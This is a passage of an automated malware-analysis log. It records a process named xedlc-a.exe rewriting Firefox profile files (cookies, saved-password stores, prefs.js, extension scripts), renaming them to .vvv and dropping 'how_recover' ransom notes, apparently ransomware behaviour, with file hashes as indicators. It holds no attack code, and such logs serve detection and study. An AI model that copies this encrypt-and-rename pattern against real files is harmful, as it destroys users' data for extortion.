57180.            pid: 1056
57181.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57182.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57183.            ads:
57184.          fid (ads:): 281474976778383
57185.          ntstatus: 0x0
57186.          CreateOptions: 0x0
57187.        file:
57188.          timestamp: 85851
57189.          mode: created
57190.          sequenceNumber: 1444
57191.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\how_recover+utm.html
57192.          processinfo:
57193.            pid: 1056
57194.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57195.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57196.            ads:
57197.          fid (ads:): 281474976778384
57198.          ntstatus: 0x0
57199.          CreateOptions: 0x60
57200.        file:
57201.          timestamp: 85859
57202.          mode: close
57203.          sequenceNumber: 1445
57204.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\how_recover+utm.html
57205.          filesize: 9495
57206.          md5sum: 95f596a25dff51b6af2042b1bbe02985
57207.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
57208.          processinfo:
57209.            pid: 1056
57210.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57211.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57212.            ads:
57213.          fid (ads:): 281474976778384
57214.          ntstatus: 0x0
57215.          CreateOptions: 0x0
57216.        file:
57217.          timestamp: 85868
57218.          mode: open
57219.          sequenceNumber: 1446
57220.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\cookies.txt
57221.          filesize: 157
57222.          processinfo:
57223.            pid: 1056
57224.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57225.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57226.            ads:
57227.          fid (ads:): 562949953478852
57228.          ntstatus: 0x0
57229.          CreateOptions: 0x200000
57230.        file:
57231.          timestamp: 85878
57232.          mode: close
57233.          sequenceNumber: 1447
57234.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\cookies.txt
57235.          filesize: 574
57236.          md5sum: 313389f8531ac24cf5485ce138b374dc
57237.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
57238.          processinfo:
57239.            pid: 1056
57240.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57241.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57242.            ads:
57243.          fid (ads:): 562949953478852
57244.          ntstatus: 0x0
57245.          CreateOptions: 0x0
57246.        file:
57247.          timestamp: 85890
57248.          mode: rename
57249.          sequenceNumber: 1448
57250.          filesize: 574
57251.          md5sum: 313389f8531ac24cf5485ce138b374dc
57252.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
57253.          processinfo:
57254.            pid: 1056
57255.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57256.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57257.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\cookies.txt
57258.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\cookies.txt.vvv
57259.            ads:
57260.          fid (ads:): 562949953478852
57261.          ntstatus: 0x0
57262.          CreateOptions: 0x0
57263.        file:
57264.          timestamp: 85904
57265.          mode: open
57266.          sequenceNumber: 1449
57267.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
57268.          filesize: 605
57269.          processinfo:
57270.            pid: 1056
57271.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57272.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57273.            ads:
57274.          fid (ads:): 1688849860318743
57275.          ntstatus: 0x0
57276.          CreateOptions: 0x60
57277.        file:
57278.          timestamp: 85933
57279.          mode: close
57280.          sequenceNumber: 1450
57281.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
57282.          filesize: 1022
57283.          md5sum: b913116640df8332574795d0adee78de
57284.          sha1sum: 1e3f576b357cd12888687d6bdcb4b1a783fad34c
57285.          processinfo:
57286.            pid: 1056
57287.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57288.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57289.            ads:
57290.          fid (ads:): 1688849860318743
57291.          ntstatus: 0x0
57292.          CreateOptions: 0x0
57293.        file:
57294.          timestamp: 85947
57295.          mode: rename
57296.          sequenceNumber: 1451
57297.          filesize: 1022
57298.          md5sum: b913116640df8332574795d0adee78de
57299.          sha1sum: 1e3f576b357cd12888687d6bdcb4b1a783fad34c
57300.          processinfo:
57301.            pid: 1056
57302.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57303.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57304.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
57305.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js.vvv
57306.            ads:
57307.          fid (ads:): 1688849860318743
57308.          ntstatus: 0x0
57309.          CreateOptions: 0x0
57310.        file:
57311.          timestamp: 85961
57312.          mode: open
57313.          sequenceNumber: 1452
57314.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
57315.          filesize: 3770
57316.          processinfo:
57317.            pid: 1056
57318.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57319.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57320.            ads:
57321.          fid (ads:): 2251799813740112
57322.          ntstatus: 0x0
57323.          CreateOptions: 0x60
57324.        file:
57325.          timestamp: 86547
57326.          mode: close
57327.          sequenceNumber: 1453
57328.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
57329.          filesize: 4190
57330.          md5sum: af25b55db4ab05d800593cfb02532a01
57331.          sha1sum: 1b060c0d8c71d218508d6841cf3a03010917387b
57332.          processinfo:
57333.            pid: 1056
57334.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57335.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57336.            ads:
57337.          fid (ads:): 2251799813740112
57338.          ntstatus: 0x0
57339.          CreateOptions: 0x0
57340.        file:
57341.          timestamp: 86559
57342.          mode: rename
57343.          sequenceNumber: 1454
57344.          filesize: 4190
57345.          md5sum: af25b55db4ab05d800593cfb02532a01
57346.          sha1sum: 1b060c0d8c71d218508d6841cf3a03010917387b
57347.          processinfo:
57348.            pid: 1056
57349.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57350.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57351.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
57352.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js.vvv
57353.            ads:
57354.          fid (ads:): 2251799813740112
57355.          ntstatus: 0x0
57356.          CreateOptions: 0x0
57357.        file:
57358.          timestamp: 86570
57359.          mode: created
57360.          sequenceNumber: 1455
57361.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.txt
57362.          processinfo:
57363.            pid: 1056
57364.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57365.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57366.            ads:
57367.          fid (ads:): 281474976778385
57368.          ntstatus: 0x0
57369.          CreateOptions: 0x60
57370.        file:
57371.          timestamp: 86577
57372.          mode: close
57373.          sequenceNumber: 1456
57374.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.txt
57375.          filesize: 2682
57376.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
57377.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
57378.          processinfo:
57379.            pid: 1056
57380.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57381.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57382.            ads:
57383.          fid (ads:): 281474976778385
57384.          ntstatus: 0x0
57385.          CreateOptions: 0x0
57386.        file:
57387.          timestamp: 86726
57388.          mode: created
57389.          sequenceNumber: 1457
57390.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.html
57391.          processinfo:
57392.            pid: 1056
57393.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57394.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57395.            ads:
57396.          fid (ads:): 281474976778386
57397.          ntstatus: 0x0
57398.          CreateOptions: 0x60
57399.        file:
57400.          timestamp: 86733
57401.          mode: close
57402.          sequenceNumber: 1458
57403.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.html
57404.          filesize: 9495
57405.          md5sum: 95f596a25dff51b6af2042b1bbe02985
57406.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
57407.          processinfo:
57408.            pid: 1056
57409.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57410.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57411.            ads:
57412.          fid (ads:): 281474976778386
57413.          ntstatus: 0x0
57414.          CreateOptions: 0x0
57415.        file:
57416.          timestamp: 86742
57417.          mode: open
57418.          sequenceNumber: 1459
57419.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
57420.          filesize: 1442
57421.          processinfo:
57422.            pid: 1056
57423.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57424.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57425.            ads:
57426.          fid (ads:): 1125899906897485
57427.          ntstatus: 0x0
57428.          CreateOptions: 0x60
57429.        file:
57430.          timestamp: 86804
57431.          mode: close
57432.          sequenceNumber: 1460
57433.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
57434.          filesize: 1870
57435.          md5sum: a00d345060f1beda4324fc4dbb3228fc
57436.          sha1sum: f486f297a818b14e964e52adaa801d6c37125a2b
57437.          processinfo:
57438.            pid: 1056
57439.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57440.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57441.            ads:
57442.          fid (ads:): 1125899906897485
57443.          ntstatus: 0x0
57444.          CreateOptions: 0x0
57445.        file:
57446.          timestamp: 86815
57447.          mode: rename
57448.          sequenceNumber: 1461
57449.          filesize: 1870
57450.          md5sum: a00d345060f1beda4324fc4dbb3228fc
57451.          sha1sum: f486f297a818b14e964e52adaa801d6c37125a2b
57452.          processinfo:
57453.            pid: 1056
57454.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57456.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
57457.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt.vvv
57458.            ads:
57459.          fid (ads:): 1125899906897485
57460.          ntstatus: 0x0
57461.          CreateOptions: 0x0
57462.        file:
57463.          timestamp: 86826
57464.          mode: created
57465.          sequenceNumber: 1462
57466.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.txt
57467.          processinfo:
57468.            pid: 1056
57469.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57470.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57471.            ads:
57472.          fid (ads:): 281474976778387
57473.          ntstatus: 0x0
57474.          CreateOptions: 0x60
57475.        file:
57476.          timestamp: 86833
57477.          mode: close
57478.          sequenceNumber: 1463
57479.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.txt
57480.          filesize: 2682
57481.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
57482.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
57483.          processinfo:
57484.            pid: 1056
57485.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57486.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57487.            ads:
57488.          fid (ads:): 281474976778387
57489.          ntstatus: 0x0
57490.          CreateOptions: 0x0
57491.        file:
57492.          timestamp: 86842
57493.          mode: created
57494.          sequenceNumber: 1464
57495.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.html
57496.          processinfo:
57497.            pid: 1056
57498.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57499.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57500.            ads:
57501.          fid (ads:): 281474976778388
57502.          ntstatus: 0x0
57503.          CreateOptions: 0x60
57504.        file:
57505.          timestamp: 86849
57506.          mode: close
57507.          sequenceNumber: 1465
57508.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\how_recover+utm.html
57509.          filesize: 9495
57510.          md5sum: 95f596a25dff51b6af2042b1bbe02985
57511.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
57512.          processinfo:
57513.            pid: 1056
57514.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57515.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57516.            ads:
57517.          fid (ads:): 281474976778388
57518.          ntstatus: 0x0
57519.          CreateOptions: 0x0
57520.        file:
57521.          timestamp: 86857
57522.          mode: created
57523.          sequenceNumber: 1466
57524.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\how_recover+utm.txt
57525.          processinfo:
57526.            pid: 1056
57527.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57528.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57529.            ads:
57530.          fid (ads:): 281474976778389
57531.          ntstatus: 0x0
57532.          CreateOptions: 0x60
57533.        file:
57534.          timestamp: 86864
57535.          mode: close
57536.          sequenceNumber: 1467
57537.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\how_recover+utm.txt
57538.          filesize: 2682
57539.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
57540.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
57541.          processinfo:
57542.            pid: 1056
57543.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57544.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57545.            ads:
57546.          fid (ads:): 281474976778389
57547.          ntstatus: 0x0
57548.          CreateOptions: 0x0
57549.        file:
57550.          timestamp: 86894
57551.          mode: created
57552.          sequenceNumber: 1468
57553.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\how_recover+utm.html
57554.          processinfo:
57555.            pid: 1056
57556.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57557.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57558.            ads:
57559.          fid (ads:): 281474976778390
57560.          ntstatus: 0x0
57561.          CreateOptions: 0x60
57562.        file:
57563.          timestamp: 86900
57564.          mode: close
57565.          sequenceNumber: 1469
57566.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\how_recover+utm.html
57567.          filesize: 9495
57568.          md5sum: 95f596a25dff51b6af2042b1bbe02985
57569.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
57570.          processinfo:
57571.            pid: 1056
57572.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57573.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57574.            ads:
57575.          fid (ads:): 281474976778390
57576.          ntstatus: 0x0
57577.          CreateOptions: 0x0
57578.        file:
57579.          timestamp: 86909
57580.          mode: created
57581.          sequenceNumber: 1470
57582.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\minidumps\how_recover+utm.txt
57583.          processinfo:
57584.            pid: 1056
57585.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57586.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57587.            ads:
57588.          fid (ads:): 281474976778391
57589.          ntstatus: 0x0
57590.          CreateOptions: 0x60
57591.        file:
57592.          timestamp: 86915
57593.          mode: close
57594.          sequenceNumber: 1471
57595.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\minidumps\how_recover+utm.txt
57596.          filesize: 2682
57597.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
57598.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
57599.          processinfo:
57600.            pid: 1056
57601.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57602.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57603.            ads:
57604.          fid (ads:): 281474976778391
57605.          ntstatus: 0x0
57606.          CreateOptions: 0x0
57607.        file:
57608.          timestamp: 86923
57609.          mode: created
57610.          sequenceNumber: 1472
57611.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\minidumps\how_recover+utm.html
57612.          processinfo:
57613.            pid: 1056
57614.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57615.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57616.            ads:
57617.          fid (ads:): 281474976778392
57618.          ntstatus: 0x0
57619.          CreateOptions: 0x60
57620.        file:
57621.          timestamp: 86930
57622.          mode: close
57623.          sequenceNumber: 1473
57624.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\minidumps\how_recover+utm.html
57625.          filesize: 9495
57626.          md5sum: 95f596a25dff51b6af2042b1bbe02985
57627.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
57628.          processinfo:
57629.            pid: 1056
57630.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57631.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57632.            ads:
57633.          fid (ads:): 281474976778392
57634.          ntstatus: 0x0
57635.          CreateOptions: 0x0
57636.        file:
57637.          timestamp: 86939
57638.          mode: open
57639.          sequenceNumber: 1474
57640.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\prefs.js
57641.          filesize: 3672
57642.          processinfo:
57643.            pid: 1056
57644.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57645.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57646.            ads:
57647.          fid (ads:): 1970324837029481
57648.          ntstatus: 0x0
57649.          CreateOptions: 0x60
57650.        file:
57651.          timestamp: 86987
57652.          mode: close
57653.          sequenceNumber: 1475
57654.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\prefs.js
57655.          filesize: 4094
57656.          md5sum: db6d5b4b813683dd8d9ff445b852f05b
57657.          sha1sum: ff95c969d9c5c587668104e38ab0069d6b270c62
57658.          processinfo:
57659.            pid: 1056
57660.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57661.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57662.            ads:
57663.          fid (ads:): 1970324837029481
57664.          ntstatus: 0x0
57665.          CreateOptions: 0x0
57666.        file:
57667.          timestamp: 87105
57668.          mode: rename
57669.          sequenceNumber: 1476
57670.          filesize: 4094
57671.          md5sum: db6d5b4b813683dd8d9ff445b852f05b
57672.          sha1sum: ff95c969d9c5c587668104e38ab0069d6b270c62
57673.          processinfo:
57674.            pid: 1056
57675.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57676.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57677.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\prefs.js
57678.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\prefs.js.vvv
57679.            ads:
57680.          fid (ads:): 1970324837029481
57681.          ntstatus: 0x0
57682.          CreateOptions: 0x0
57683.        file:
57684.          timestamp: 87180
57685.          mode: open
57686.          sequenceNumber: 1477
57687.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons2.txt
57688.          filesize: 157
57689.          processinfo:
57690.            pid: 1056
57691.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57692.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57693.            ads:
57694.          fid (ads:): 562949953478847
57695.          ntstatus: 0x0
57696.          CreateOptions: 0x200000
57697.        file:
57698.          timestamp: 87232
57699.          mode: close
57700.          sequenceNumber: 1478
57701.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons2.txt
57702.          filesize: 574
57703.          md5sum: 313389f8531ac24cf5485ce138b374dc
57704.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
57705.          processinfo:
57706.            pid: 1056
57707.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57708.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57709.            ads:
57710.          fid (ads:): 562949953478847
57711.          ntstatus: 0x0
57712.          CreateOptions: 0x0
57713.        file:
57714.          timestamp: 87250
57715.          mode: rename
57716.          sequenceNumber: 1479
57717.          filesize: 574
57718.          md5sum: 313389f8531ac24cf5485ce138b374dc
57719.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
57720.          processinfo:
57721.            pid: 1056
57722.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57723.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57724.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons2.txt
57725.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons2.txt.vvv
57726.            ads:
57727.          fid (ads:): 562949953478847
57728.          ntstatus: 0x0
57729.          CreateOptions: 0x0
57730.        file:
57731.          timestamp: 87298
57732.          mode: open
57733.          sequenceNumber: 1480
57734.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons3.txt
57735.          filesize: 157
57736.          processinfo:
57737.            pid: 1056
57738.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57739.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57740.            ads:
57741.          fid (ads:): 562949953478848
57742.          ntstatus: 0x0
57743.          CreateOptions: 0x200000
57744.        file:
57745.          timestamp: 87307
57746.          mode: close
57747.          sequenceNumber: 1481
57748.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons3.txt
57749.          filesize: 574
57750.          md5sum: 313389f8531ac24cf5485ce138b374dc
57751.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
57752.          processinfo:
57753.            pid: 1056
57754.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57756.            ads:
57757.          fid (ads:): 562949953478848
57758.          ntstatus: 0x0
57759.          CreateOptions: 0x0
57760.        file:
57761.          timestamp: 87317
57762.          mode: rename
57763.          sequenceNumber: 1482
57764.          filesize: 574
57765.          md5sum: 313389f8531ac24cf5485ce138b374dc
57766.          sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
57767.          processinfo:
57768.            pid: 1056
57769.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57770.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57771.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons3.txt
57772.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\signons3.txt.vvv
57773.            ads:
57774.          fid (ads:): 562949953478848
57775.          ntstatus: 0x0
57776.          CreateOptions: 0x0
57777.        file:
57778.          timestamp: 87326
57779.          mode: created
57780.          sequenceNumber: 1483
57781.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\how_recover+utm.txt
57782.          processinfo:
57783.            pid: 1056
57784.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57785.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57786.            ads:
57787.          fid (ads:): 281474976778393
57788.          ntstatus: 0x0
57789.          CreateOptions: 0x60
57790.        file:
57791.          timestamp: 87332
57792.          mode: close
57793.          sequenceNumber: 1484
57794.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\how_recover+utm.txt
57795.          filesize: 2682
57796.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
57797.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
57798.          processinfo:
57799.            pid: 1056
57800.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57801.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57802.            ads:
57803.          fid (ads:): 281474976778393
57804.          ntstatus: 0x0
57805.          CreateOptions: 0x0
57806.        file:
57807.          timestamp: 87339
57808.          mode: created
57809.          sequenceNumber: 1485
57810.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\how_recover+utm.html
57811.          processinfo:
57812.            pid: 1056
57813.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57814.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57815.            ads:
57816.          fid (ads:): 281474976778394
57817.          ntstatus: 0x0
57818.          CreateOptions: 0x60
57819.        file:
57820.          timestamp: 87346
57821.          mode: close
57822.          sequenceNumber: 1486
57823.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\how_recover+utm.html
57824.          filesize: 9495
57825.          md5sum: 95f596a25dff51b6af2042b1bbe02985
57826.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
57827.          processinfo:
57828.            pid: 1056
57829.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
57830.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
57831.            ads:
57832.          fid (ads:): 281474976778394
57833.          ntstatus: 0x0
57834.          CreateOptions: 0x0
57835.        file:
57836.          timestamp: 87356
57837.          mode: created
57838.          sequenceNumber: 1487
57839.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\pmy9ej3o.526frdyw.default\bookmarkbackups\how_recover+utm.txt
57840.          processinfo:
57841.            pid: 1056
57842.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
